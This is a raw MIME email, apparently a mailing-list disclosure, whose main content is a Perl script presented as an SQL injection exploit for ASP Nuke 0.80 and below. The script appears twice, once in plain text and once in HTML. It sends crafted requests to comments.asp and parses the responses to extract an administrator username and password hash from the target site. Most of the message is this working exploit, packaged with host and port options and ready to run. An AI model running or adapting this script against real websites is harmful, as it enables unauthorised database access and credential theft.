This is a multi-part message in MIME format. ------=_NextPart_000_0039_01C5473D.C6C4A380 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable =20 #!/usr/bin/perl use IO::Socket; use Getopt::Std; print "[x]ASP NUKE 0.80 and below Comments.asp Sql Injection Exploit\n"; print "[x]By Diabolic Crab\n"; print "[x]http://www.digitalparadox.org\n\n"; getopt("h:p:"); $opt_p ||=3D 80; if(!$opt_h) { die("[x] Usage: $0 -h [-p ]\n"); } $sqlpass =3D "/module/support/task/comments.asp?taskid=3DPassword-- = HTTP/1.0\n"; $sqllogin =3D "/module/support/task/comments.asp?taskid=3DUsername-- = HTTP/1.0\n"; print "[x] Host: $opt_h\n"; print "[x] Port: $opt_p\n"; $Q1 =3D "GET $sqllogin"; $Q1 .=3D "Host: ".$opt_h."\n\n"; $Q2 =3D "GET $sqlpass"; $Q2 .=3D "Host: ".$opt_h."\n\n"; $s =3D IO::Socket::INET->new(Proto =3D> 'tcp', PeerAddr =3D> $opt_h, = PeerPort =3D> $opt_p) or die("Can't connect!"); $s->send($Q1); $s->recv($usr, 1024); $s =3D IO::Socket::INET->new(Proto=3D>'tcp', PeerAddr =3D> $opt_h, = PeerPort =3D> $opt_p) or die("Can't connect!"); $s->send($Q2); $s->recv($pass, 1024); $s =3D index($usr,"'"); $e =3D index($usr,"'", $s + 1); $f =3D $e - $s - 1; print "[x]Username in SHA 256 is: "; print substr($usr, $s + 1, $f); print "\n"; $s =3D index($pass,"'"); $e =3D index($pass,"'", $s + 1); $f =3D $e - $s - 1; print "[x]Password hash in SHA 256 is: "; print substr($pass, $s + 1, $f); print "\n"; Sincerely, Diabolic Crab Web Security, Research & Development dP Security email: dcrab@digitalparadox.org website: http://www.digitalparadox.org=20 This message is confidential. It may also contain information that is=20 privileged or otherwise legally exempt from disclosure.=20 If you have received it by mistake please let us know by e-mail=20 immediately and delete it from your system; should also not copy=20 the message nor disclose its contents to anyone. Many thanks. ------=_NextPart_000_0039_01C5473D.C6C4A380 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
 
#!/usr/bin/perl

use IO::Socket;
use Getopt::Std;
print "[x]ASP NUKE 0.80 and below Comments.asp Sql Injection Exploit\n";
print "[x]By Diabolic Crab\n";
print "[x]http://www.digitalparadox.org\n\n";

getopt("h:p:");

$opt_p ||=3D 80;

if(!$opt_h) {
    die("[x] Usage: $0 -h <host> [-p <port>]\n");
}

$sqlpass =3D "/module/support/task/comments.asp?taskid=3DPassword-- =
HTTP/1.0\n";
$sqllogin =3D "/module/support/task/comments.asp?taskid=3DUsername-- =
HTTP/1.0\n";

print "[x] Host: $opt_h\n";
print "[x] Port: $opt_p\n";

$Q1 =3D "GET $sqllogin";
$Q1 .=3D "Host: ".$opt_h."\n\n";

$Q2 =3D "GET $sqlpass";
$Q2 .=3D "Host: ".$opt_h."\n\n";

$s =3D IO::Socket::INET->new(Proto =3D> 'tcp', PeerAddr =3D> =
$opt_h, PeerPort =3D> $opt_p) or die("Can't connect!");
$s->send($Q1);
$s->recv($usr, 1024);

$s =3D IO::Socket::INET->new(Proto=3D>'tcp', PeerAddr =3D> =
$opt_h, PeerPort =3D> $opt_p) or die("Can't connect!");
$s->send($Q2);
$s->recv($pass, 1024);

$s =3D index($usr,"'");
$e =3D index($usr,"'", $s + 1);
$f =3D $e - $s - 1;
print "[x]Username in SHA 256 is: ";
print substr($usr, $s + 1, $f);
print "\n";

$s =3D index($pass,"'");
$e =3D index($pass,"'", $s + 1);
$f =3D $e - $s - 1;
print "[x]Password hash in SHA 256 is: ";
print substr($pass, $s + 1, $f);
print "\n";
Sincerely,
Diabolic Crab
Web = Security, =20 Research & Development
dP Security
email: dcrab@digitalparadox.org
= website:=20 http://www.digitalparadox.org =
 
This message is confidential. It may = also contain=20 information that is
privileged or otherwise legally exempt from = disclosure.=20
If you have received it by mistake please let us know by e-mail=20
immediately and delete it from your system; should also not copy =
the=20 message nor disclose its contents to anyone. Many thanks.
 
 
------=_NextPart_000_0039_01C5473D.C6C4A380--